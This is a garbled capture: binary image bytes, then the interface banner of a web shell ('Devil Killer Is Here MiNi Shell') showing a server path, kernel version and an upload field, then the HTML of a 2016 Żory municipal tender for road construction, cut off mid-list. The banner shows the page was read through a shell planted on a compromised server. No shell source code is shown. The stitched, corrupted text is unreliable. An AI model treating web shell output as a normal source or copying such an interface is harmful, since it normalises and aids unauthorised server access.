JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160301/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160301/44808-N-2016.html

<p class="kh_header"><b>Żory: Budowa i utwardzenie dróg w Żorach - etap II</b><br>
<b>Numer ogłoszenia: 44808 - 2016; data zamieszczenia: 01.03.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska  Żory , Al. Wojska Polskiego 25, 44-240 Żory, woj. śląskie, tel. 32 4348245, faks 32 4348248.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.zory.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa i utwardzenie dróg w Żorach - etap II.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Budowa i utwardzenie dróg w Żorach - etap II

Zamówienie zostało podzielone na  7 części:
Część 1 Nawierzchnie asfaltowe
Część 2 Nawierzchnie z kostki brukowej
Część 3 Utwardzenie kruszywem tłuczniowym
Część 4 Utwardzenie i wyrównanie nawierzchni dróg gminnych
Część 5 Przebudowa nawierzchni Al. Otto Sterna - etap I
Część nr 6  Przebudowa węzła Obwodnicy Północnej z DK-81 w Żorach
Część nr 7  Budowa parkingu przy ul. Powstańców w Żorach wraz z odwodnieniem i oświetleniem.
Budowa i utwardzenie dróg w Żorach - etap II

Zamówienie zostało podzielone na  7 części:
Część 1 Nawierzchnie asfaltowe
Część 2 Nawierzchnie z kostki brukowej
Część 3 Utwardzenie kruszywem tłuczniowym
Część 4 Utwardzenie i wyrównanie nawierzchni dróg gminnych
Część 5 Przebudowa nawierzchni Al. Otto Sterna - etap I
Część nr 6  Przebudowa węzła Obwodnicy Północnej z DK-81 w Żorach
Część nr 7  Budowa parkingu przy ul. Powstańców w Żorach wraz z odwodnieniem i oświetleniem.

Zamawiający dopuszcza możliwość składania ofert częściowych.

Szczegółowy opis przedmiotu zamówienia zawiera:
a) dokumentacja projektowa 
b) specyfikacje techniczne wykonania i odbioru robót,
c) przedmiary robót. 
d) mapy z zakresami robót 

Zakres robót

Część 1 Nawierzchnie asfaltowe
Zadanie 1 Wykonanie nawierzchni asfaltowej drogi zbiorczej do terenów inwestycyjnych przy Obwodnicy Północnej: 
- organizacja placu budowy wraz z wprowadzeniem tymczasowej organizacji ruchu (jeżeli będzie wymagana),
- wykonanie rowków pod krawężniki z wywozem urobku na wysyp (z potwierdzeniem odbioru i opłatą za składowanie),
- ułożenie nowych krawężników betonowych 15x30cm wzdłuż drogi na ławie betonowej z oporem,
- wyrównanie i zagęszczenie istniejącej podbudowy drogi,
- skropienie nawierzchni drogowej asfaltem,
- wykonanie nawierzchni drogi z mieszanek mineralno-bitumicznych:
a) warstwa wiążąca z mieszanki mineralno-bitumicznej gr. 6cm,
b) warstwa ścieralna z betonu asfaltowego gr. 5cm,
- pełna obsługa geodezyjna (okazanie granic działek drogowych, pomiar geodezyjny powykonawczy),
- badania nośności podłoża sondą dynamiczną,
- ręczne plantowanie poboczy,
- porządkowanie terenu po robotach budowlanych.

Zadanie 2  Wykonanie nawierzchni asfaltowej drogi ul. Leśników.
- organizacja placu budowy wraz z wprowadzeniem tymczasowej organizacji ruchu (jeżeli będzie wymagana),
- cięcie piłą nawierzchni bitumicznej,
- rozbiórka nawierzchni bitumicznej,
- załadunek i wywóz materiałów z rozbiórki na wysyp (z potwierdzeniem odbioru i opłatą za składowanie),
- czyszczenie nawierzchni bitumicznej,
- czyszczenie poboczy,
- uzupełnienie ubytków w istniejącej nawierzchni,
- regulacja pionowa studzienek i włazów kanałowych
- skropienie nawierzchni drogowej asfaltem,
- wykonanie nowej nawierzchni z mieszanek mineralno-bitumicznych (warstwa ścieralna z betonu asfaltowego gr. 5cm),
- wykonanie zjazdów o nawierzchni z tłucznia kamiennego,
- humusowanie pobocza z obsianiem trawą,
- porządkowanie terenu po robotach budowlanych.

Zadanie 3  Wykonanie nawierzchni asfaltowej ul. Goliasza.
- organizacja placu budowy wraz z wprowadzeniem tymczasowej organizacji ruchu (jeżeli będzie wymagana),
- wyrównanie istniejącej podbudowy warstwą kruszywa łamanego pod nawierzchnie asfaltowe,
- badania nośności podbudowy,
- wykonanie nawierzchni drogi z mieszanek mineralno-bitumicznych:
a) warstwa wiążąca z mieszanki mineralno-bitumicznej gr. 4cm,
b) warstwa ścieralna z betonu asfaltowego gr. 4cm,
- regulacja pionowa włazów kanałowych studni kanalizacji sanitarnej,
- pełna obsługa geodezyjna (okazanie granic działek drogowych, pomiar geodezyjny powykonawczy),
- wykonanie poboczy z destruktu asfaltowego ,
- porządkowanie terenu po robotach budowlanych.

Zadanie 4  Wykonanie nawierzchni asfaltowej drogi ul. Małej
- organizacja placu budowy wraz z wprowadzeniem tymczasowej organizacji ruchu (jeżeli będzie wymagana),
- korytowanie drogi pod warstwy konstrukcyjne,
- załadunek i wywóz materiałów z korytowania na wysyp,
- wykonanie podbudowy z kruszywa łamanego,
- profilowanie i zagęszczenie podbudowy,
- badania nośności podbudowy,
- regulacja pionowa włazów kanałowych studni kanalizacji sanitarnej,
- wykonanie warstwy wiążącej z mieszanki mineralno-bitumicznej gr. 4cm,
- wykonanie warstwy ścieralnej z betonu asfaltowego gr. 4cm,
- pełna obsługa geodezyjna (okazanie granic działek drogowych, pomiar geodezyjny powykonawczy),
- ręczne plantowanie poboczy,
- porządkowanie terenu po robotach budowlanych.

Zadanie 5  Wykonanie nawierzchni asfaltowej drogi ul. Zielnej
- organizacja placu budowy wraz z wprowadzeniem tymczasowej organizacji ruchu (jeżeli będzie wymagana),
- korytowanie drogi pod warstwy konstrukcyjne,
- załadunek i wywóz materiałów z korytowania na wysyp,
- wykonanie podbudowy z kruszywa łamanego,
- profilowanie i zagęszczenie podbudowy,
- badania nośności podbudowy,
- regulacja pionowa włazów kanałowych studni kanalizacji sanitarnej,
- wykonanie warstwy wiążącej z mieszanki mineralno-bitumicznej gr. 4cm,
- wykonanie warstwy ścieralnej z betonu asfaltowego gr. 4cm,
- pełna obsługa geodezyjna (okazanie granic działek drogowych, pomiar geodezyjny powykonawczy),
- ręczne plantowanie poboczy,
- porządkowanie terenu po robotach budowlanych.


Zadanie 6  Wykonanie  nawierzchni asfaltowej drogi ul. Pukowca
- organizacja placu budowy wraz z wprowadzeniem tymczasowej organizacji ruchu (jeżeli będzie wymagana),
- frezowanie nawierzchni asfaltowej,
- załadunek i wywóz materiałów z frezowania,
- regulacja pionowa włazów kanałowych studni kanalizacji sanitarnej,
- wykonanie warstwy wiążącej z mieszanki mineralno-bitumicznej gr. 4cm,
- wykonanie warstwy ścieralnej z betonu asfaltowego gr. 4cm,
- pełna obsługa geodezyjna (okazanie granic działek drogowych, pomiar geodezyjny powykonawczy),
- ręczne plantowanie poboczy,
- porządkowanie terenu po robotach budowlanych.

Zadanie 7  Wykonanie nawierzchni asfaltowej drogi ul. Pszczyńskiej
- organizacja placu budowy wraz z wprowadzeniem tymczasowej organizacji ruchu,
- frezowanie nawierzchni asfaltowej,
- korytowanie drogi pod warstwy konstrukcyjne,
- załadunek i wywóz materiałów z korytowania na wysyp,
- wykonanie podbudowy z kruszywa łamanego,
- profilowanie i zagęszczenie podbudowy,
- wykonanie podbudowy zasadniczej z betonu asfaltowego AC22P,
- międzywarstwowe mechaniczne czyszczenie nawierzchni drogowej,
- międzywarstwowe skropienie nawierzchni drogowej asfaltem,
- wykonanie warstwy wyrównawczej z betonu asfaltowego AC16W,
- wykonanie warstwy ścieralnej warstwy ścieralnej z betonu asfaltowego AC11S,
- porządkowanie terenu po robotach budowlanych.

Zadanie 8  Wykonanie nawierzchni asfaltowej drogi ul. Podlesie.
- organizacja placu budowy wraz z wprowadzeniem tymczasowej organizacji ruchu (jeżeli będzie wymagana),
- cięcie piłą nawierzchni bitumicznej,
- rozbiórka nawierzchni bitumicznej,
- załadunek i wywóz materiałów z rozbiórki na wysyp (z potwierdzeniem odbioru i opłatą za składowanie),
- czyszczenie nawierzchni bitumicznej,
- czyszczenie poboczy,
- uzupełnienie ubytków w istniejącej nawierzchni wraz z jej miejscowym wyrównaniem,
- częściowe poszerzenie podbudowy,
- regulacja pionowa studzienek i włazów kanałowych
- skropienie nawierzchni drogowej asfaltem,
- wykonanie nowej nawierzchni z mieszanek mineralno-bitumicznych (warstwa ścieralna z betonu asfaltowego gr. 5cm),
- wykonanie poboczy o nawierzchni z tłucznia kamiennego,
- humusowanie pobocza z obsianiem trawą,
- porządkowanie terenu po robotach budowlanych.

Zadanie 9  Wykonanie nawierzchni asfaltowej chodnika przy ul. Minimalnej
organizacja placu budowy wraz z wprowadzeniem tymczasowej organizacji ruchu (jeżeli będzie wymagana),
- cięcie piłą nawierzchni bitumicznej,
- rozbiórka nawierzchni bitumicznej oraz z kostki betonowej, krawężników i obrzeży,
- załadunek i wywóz materiałów z rozbiórki na wysyp (z potwierdzeniem odbioru i opłatą za składowanie),
- przełożenie nawierzchni z kostki betonowej,
- ułożenie krawężników betonowych 30x15x100 na ławie betonowej,
- ułożenie obrzeży betonowych 30x8x100,
- wyrównanie istniejącej podbudowy tłuczniem kamiennym,
- czyszczenie poboczy,
- regulacja pionowa studzienek i włazów kanałowych
- skropienie nawierzchni drogowej asfaltem,
- wykonanie nowej nawierzchni z mieszanek mineralno-bitumicznych (warstwa ścieralna z betonu asfaltowego gr. 4cm na chodniku i 7 cm na jezdni),
- humusowanie pobocza z obsianiem trawą,
- porządkowanie terenu po robotach budowlanych.

Część 2 Nawierzchnie z kostki brukowej

Zadanie 1 Wykonanie chodnika w Parku Cegielnia
- organizacja placu budowy,
- korytowanie pod nowe nawierzchnie brukowe,
- załadunek i wywóz materiałów z korytowania,
- wykonanie nowej podbudowy tłuczniowej pod nawierzchnie brukowe,
- ułożenie nowych obrzeży betonowych 8x30cm na ławie betonowej z oporem,
- wykonanie nawierzchni brukowych chodników z kostki brukowej betonowej wibroprasowanej gr. 6cm na podsypce cementowo- piaskowej gr. 3cm, rodzaj kostki (trapezowa szara ),
- pełna obsługa geodezyjna (okazanie granic działek drogowych, pomiar geodezyjny powykonawczy),
- humusowanie pobocza z obsianiem trawą,
- porządkowanie terenu po robotach budowlanych.

Zadanie 2 Wykonanie chodników na Skwerze Europejskim 
a) odcinek nr 2
- rozbiórka płyt żelbetowych
- wykonanie korytowania po trasie chodnika
- załadunek i wywóz materiałów z korytowania na wysyp.
- profilowanie i zagęszczenie podłoża oraz wykonanie utwardzonej nawierzchni.
- zabudowa obrzeży betonowych o wym. 30x8 cm,
- wykonanie nawierzchni z kostki brukowej szarej, prostokątnej fazowej 6 cm.
- pełna obsługa geodezyjna ( odtworzenie i okazanie granic działek drogowych, pomiar geodezyjny powykonawczy ).
- ręczne plantowanie poboczy i porządkowanie terenu.

b) odcinek nr 4
- rozebranie obrzeży 6x20 cm,
- wykonanie korytowania po trasie chodnika,
- załadunek i wywóz materiałów z korytowania na wysyp,
- profilowanie i zagęszczenie podłoża oraz wykonanie utwardzonej nawierzchni,
- zabudowa obrzeży betonowych o wym. 30x8 cm,
- wykonanie nawierzchni z kostki brukowej szarej, prostokątnej fazowej 6 cm.
- pełna obsługa geodezyjna ( odtworzenie i okazanie granic działek drogowych, pomiar geodezyjny powykonawczy ),
- ręczne plantowanie poboczy i porządkowanie terenu.

c) odcinek nr 5
- rozbiórka płyt żelbetowych,
- wykonanie korytowania po trasie chodnika,
- załadunek i wywóz materiałów z korytowania na wysyp,
- profilowanie i zagęszczenie podłoża oraz wykonanie utwardzonej nawierzchni,
- zabudowa obrzeży betonowych o wym. 30x8 cm,
- wykonanie nawierzchni z kostki brukowej szarej, prostokątnej fazowej 6 cm,
- pełna obsługa geodezyjna (odtworzenie i okazanie granic działek drogowych, pomiar geodezyjny powykonawczy),
- ręczne plantowanie poboczy i porządkowanie terenu.

Zadanie 3 Wykonanie nawierzchni drogi ul. Pogodnej
- organizacja placu budowy wraz z wprowadzeniem tymczasowej organizacji ruchu (jeżeli będzie wymagana),
- rozbiórka krawężnika,
- korytowanie drogi pod warstwy konstrukcyjne,
- załadunek i wywóz materiałów z korytowania na wysyp,
- profilowanie i zagęszczenie podbudowy,
- zabudowa krawężników najazdowych,
- wykonanie studni i wpustów drogowych kanalizacji deszczowej,
- regulacja pionowa włazów kanałowych studni kanalizacji sanitarnej i deszczowej,
- wykonanie nawierzchni z kostki brukowej starobruk szary, 8cm.
- pełna obsługa geodezyjna ( odtworzenie i okazanie granic działek drogowych, pomiar geodezyjny powykonawczy ).
- ręczne plantowanie poboczy, zabudowa płyt ażurowych i porządkowanie terenu.


Zadanie 4 Wykonanie nawierzchni drogi ul. Pięknej
- organizacja placu budowy wraz z wprowadzeniem tymczasowej organizacji ruchu (jeżeli będzie wymagana),
- rozbiórka krawężnika,
- korytowanie drogi pod warstwy konstrukcyjne,
- załadunek i wywóz materiałów z korytowania na wysyp,
- profilowanie i zagęszczenie podbudowy,
- zabudowa krawężników najazdowych,
- wykonanie studni i wpustów drogowych kanalizacji deszczowej,
- regulacja pionowa włazów kanałowych studni kanalizacji sanitarnej i deszczowej,
- wykonanie nawierzchni z kostki brukowej starobruk szary, 8cm,
- pełna obsługa geodezyjna ( odtworzenie i okazanie granic działek drogowych, pomiar geodezyjny powykonawczy ),
- ręczne plantowanie poboczy, zabudowa płyt ażurowych i porządkowanie terenu.

Zadanie 5 Wykonanie nawierzchni drogi ul. Kiepury
- organizacja placu budowy wraz z wprowadzeniem tymczasowej organizacji ruchu (jeżeli będzie wymagana),
- rozbiórka płyt żelbetowych oraz ich zdeponowanie w ZTK Żory ul. Okrężna 5,
- korytowanie drogi pod warstwy konstrukcyjne,
- załadunek i wywóz materiałów z korytowania na wysyp,
- profilowanie i zagęszczenie podbudowy,
- zabudowa krawężników najazdowych, korytek odwadniających,
- wykonanie studni i wpustów drogowych kanalizacji deszczowej,
- regulacja pionowa włazów kanałowych studni kanalizacji sanitarnej i deszczowej,
- wykonanie nawierzchni z kostki brukowej starobruk szary, 8cm.
- pełna obsługa geodezyjna ( odtworzenie i okazanie granic działek drogowych, pomiar geodezyjny powykonawczy ).
- ręczne plantowanie poboczy, zabudowa płyt ażurowych i porządkowanie terenu.

Część 3 Utwardzenie kruszywem tłuczniowym 

Zadanie 1 Wykonanie nawierzchni drogi ul. Kominka
- wykonanie korytowania po trasie nowej nawierzchni utwardzonej drogi,
- załadunek i wywóz materiałów z korytowania na wysyp (z potwierdzeniem odbioru i opłatą za składowanie),
- profilowanie i zagęszczenie podłoża oraz wykonanie utwardzonej nawierzchni drogi o szerokości 5,0 m z kruszywa  gr. 35cm,
- pełna obsługa geodezyjna odtworzenie i okazanie granic działek drogowych, pomiar geodezyjny powykonawczy),
- ręczne plantowanie poboczy i porządkowanie terenu.

Zadanie 2 Wykonanie nawierzchni drogi ul. Beskidzkiej
- organizacja placu budowy wraz z wprowadzeniem tymczasowej organizacji ruchu (jeżeli będzie wymagana),
- wykonanie korytowania po trasie nowej nawierzchni utwardzonej drogi.
- załadunek i wywóz materiałów z korytowania na wysyp (z potwierdzeniem odbioru i opłatą za składowanie).
- profilowanie i zagęszczenie podłoża oraz wykonanie utwardzonej nawierzchni drogi o szerokości 5,0 m.
- regulacja pionowa włazów kanałowych studni kanalizacji sanitarnej,
- pełna obsługa geodezyjna ( odtworzenie i okazanie granic działek drogowych, pomiar geodezyjny powykonawczy ).
- ręczne plantowanie poboczy i porządkowanie terenu.

Zadanie 3 Wykonanie nawierzchni drogi ul. Sudeckiej
- organizacja placu budowy wraz z wprowadzeniem tymczasowej organizacji ruchu (jeżeli będzie wymagana),
- wykonanie korytowania po trasie nowej nawierzchni utwardzonej drogi.
- załadunek i wywóz materiałów z korytowania na wysyp (z potwierdzeniem odbioru i opłatą za składowanie).
- profilowanie i zagęszczenie podłoża oraz wykonanie utwardzonej nawierzchni drogi o szerokości 5,0 m.
- regulacja pionowa włazów kanałowych studni kanalizacji sanitarnej,
- pełna obsługa geodezyjna ( odtworzenie i okazanie granic działek drogowych, pomiar geodezyjny powykonawczy ).
- ręczne plantowanie poboczy i porządkowanie terenu.

Część nr 4 Utwardzenie i wyrównanie nawierzchni dróg gminnych
Utwardzenie dróg z kruszywa o grubości 35 cm po zagęszczeniu - około 10.000 m2
Zakres robót:
- organizacja placu budowy wraz z wprowadzeniem tymczasowej organizacji ruchu (jeżeli będzie wymagana),
- wykonanie korytowania po trasie nowej nawierzchni utwardzonej drogi.
- załadunek i wywóz materiałów z korytowania na wysyp (z potwierdzeniem odbioru i opłatą za składowanie).
- profilowanie i zagęszczenie podłoża oraz wykonanie utwardzonej nawierzchni drogi o szerokości 5,0 m.
- regulacja pionowa włazów kanałowych studni kanalizacji sanitarnej
- pełna obsługa geodezyjna (odtworzenie i okazanie granic działek drogowych, pomiar geodezyjny powykonawczy).
- ręczne plantowanie poboczy i porządkowanie terenu.

Roboty w ramach części 4 wykonywane będą na każdorazowe zlecenie Zamawiającego, wskazujące zakres robót do wykonania oraz termin i miejsce ich wykonania w zależności od bieżących potrzeb w granicach administracyjnych miasta Żory.
Ostatnie zlecenie zostanie przekazane Wykonawcy nie później niż do 15.10.2016r.

Część 5 Przebudowa nawierzchni Al. Otto Sterna - etap I
Zakres robót elektrycznych:
- przeniesienie istniejących słupów i opraw oświetleniowych w nową lokalizację 5 szt.,
- wymiana istniejących słupów na nowe (SAL-5 z fundamentem ROSA TYCHY) z przeniesieniem istniejących opraw 5szt. 
- zabudowa nowych słupów SAL-5 z fundamentem i nowych opraw OPC-1/S 70W z kloszem Auris (ROSA TYCHY)  3szt. 
- ułożenie kabla YAKY 4x35 mm2 w wykopie, rurach i słupach 394m, 
- pomiary elektryczne,
- inwentaryzacja geodezyjna.

Zakres robót elektrycznych w obecnym postępowaniu przetargowym obejmuje przebudowę sieci oświetleniowej na odcinku od słupa nr D1 do słupa D10 z zachowaniem zasilania ze słupa D11 - projekt elektryczny rys. nr 1.
Uwaga - ze względu na wykorzystanie w przebudowie sieci istniejących słupów SAL-5 i opraw oświetleniowych OPC-1/S 70W z kloszem Auris (prod. ROSA TYCHY), zamawiający wymaga zastosowania tych samych produktów w przypadku zabudowy nowych materiałów.

Zakres robót drogowych
- rozbiórka istniejącej nawierzchni ciągu pieszego wraz z wysepkami przynależnymi, 
- rozbiórka obrzeży betonowych,
- wywiezienie gruzu wraz z utylizacją materiałów z rozbiórki,
- roboty pomiarowe,
- wykonanie wykopów,
- wywiezienie ziemi z terenu rozbiórki wraz z utylizacją,
- dostawa gruntu wraz z uformowaniem nasypów za obrzeżem, 
- zagęszczenie i profilowanie podłoża pod warstwy konstrukcyjne nawierzchni,
- wykonanie warstw odsączających,
- wykonanie podbudowy z kruszyw łamanych gr. 8cm,
- wykonanie podbudowy z kruszyw łamanych gr. 20cm (poszerzenie nawierzchni),
- dostawa i wykonanie nawierzchni z kostki betonowej gr. 8 cm,
- dostawa i wykonanie nawierzchni z kostki betonowej ażurowej gr. 10 cm, 
- dostawa i ułożenie obrzeży betonowych 30x8 cm na ławie betonowej,
- dostawa i ułożenie krawężników betonowych 15x30 cm na ławie betonowej,
- dostawa i montaż małej architektury,
- demontaż słupów znakowych wraz z tablicami znakowymi,
- dostawa i montaż słupów znakowych wraz z tablicami znakowymi,
- wykonanie oznakowania poziomego na skrzyżowaniach i przejściach dla pieszych,
- wykonanie oznakowania poziomego na jezdni,
- inwentaryzacja powykonawcza,

Zakres robót kanalizacyjnych:
- wykonanie wykopów liniowych, 
- zasypanie wykopów kruszywem, 
- wywiezienie ziemi z terenu rozbiórki wraz z utylizacją,
- dostawa i montaż kanałów z rur pcv  o 200 mm, 
- wykonanie podłoży pod kanały z rur, studzienki i wpusty, 
- wykonanie zabezpieczenia ścian wykopów, 
- dostawa i montaż studni rewizyjnych o 1000 mm, 
- dostawa i montaż wpustów deszczowych o 500 mm, 
- wykonanie szczelnych przejść przez ściany istniejących studni,

Część nr 6  Przebudowa węzła Obwodnicy Północnej z DK-81 w Żorach
- organizacja placu budowy wraz z wprowadzeniem tymczasowej organizacji ruchu,
- uzyskanie pozwolenia na usunięcie drzew i krzewów w Urzędzie Marszałkowskim w Katowicach wraz z przygotowaniem wniosku i niezbędnymi załącznikami w tym projektu nasadzeń zastępczych do uzyskania pozwolenia na usunięcie drzew i krzewów,
- wycinka i karczowanie drzew oraz krzewów,
- frezowanie i rozbiórka nawierzchni asfaltobetonowej,
- rozbiórka nawierzchni chodnika z kostki betonowej,
- rozbiórka krawężników oraz obrzeży betonowych na ławie betonowej z oporem,
- rozbiórka ekranów akustycznych przy DK-81,
- rozbiórka barier drogowych,
- przebudowa rowu wzdłuż Obwodnicy Północnej wraz z wylotem kanalizacji deszczowej,
- ściągnięcie warstwy humusu,
- wykonanie wzmocnienia podłoża gruntem stabilizowanym cementem,
- wykonanie, formowanie i zagęszczanie nasypu,
- wykonanie muru oporowego prefabrykowanego z elementów typu L 230x135x100
- ułożenie krawężników 15x30x100 betonowych na ławie betonowej z oporem,
- ułożenie obrzeży betonowych 8x30cm na ławie betonowej z oporem,
- ułożenie korytek betonowych odwadniających 60x45x15,
- wykonanie podbudowy z kruszywa łamanego,
- wykonanie podbudowy z betonu asfaltowego,
- wykonanie w-wy wiążącej z betonu asfaltowego,
- wykonanie nawierzchni z SMA,
- wykonanie chodnika z kostki betonowej (kostka z rozbiórki),
- montaż wpustów deszczowych,
- wykonanie przykanalika z rury PVC O250 odwodnienia wraz z murkiem czołowym betonowym do rowu,
- przebudowa istniejącego oświetlenia (przesunięcie słupów i kabla),
- montaż ekranów akustycznych (słupy i panele istniejące, pale wiercone nowe),
- montaż barier ochronnych (bariery istniejące uzupełnione nowymi),
- załadunek i wywóz materiałów z rozbiórki na wysyp (z potwierdzeniem odbioru i opłatą za składowanie),
- regulacja pionowa studzienek,
- wykonanie oznakowania poziomego i pionowego organizacji ruchu,
- pełna obsługa geodezyjna (okazanie granic działek drogowych, pomiar geodezyjny powykonawczy),
- badania nośności podłoża gruntowego,
- wykonanie nasadzenia zastępczego drzew i krzewów w proporcjach 1:1 względem drzew i krzewów usuniętych na podstawie uzyskanego pozwolenia na ich usunięcie (gatunek drzew do nasadzenia: lipa drobnolistna o minimalnej wysokości 400 cm i minimalnym obwodzie pnia 18 cm),
- humusowanie poboczy z obsianiem trawą,
- porządkowanie terenu po robotach budowlanych.

Część nr 7  Budowa parkingu przy ul. Powstańców w Żorach wraz z odwodnieniem i oświetleniem
- organizacja placu budowy wraz z wprowadzeniem tymczasowej organizacji ruchu,
- uzyskanie pozwolenia na usunięcie drzew i krzewów w Urzędzie Marszałkowskim w Katowicach wraz z przygotowaniem wniosku i niezbędnymi załącznikami w tym projektu nasadzeń zastępczych do uzyskania pozwolenia na usunięcie drzew i krzewów,
- wycinka i karczowanie drzew oraz krzewów,
- rozbiórka nawierzchni asfaltobetonowej,
- rozbiórka nawierzchni chodnika z kostki betonowej,
- rozbiórka krawężników oraz obrzeży betonowych na ławie betonowej z oporem,
- rozbiórka budynku gospodarczego z cegły,
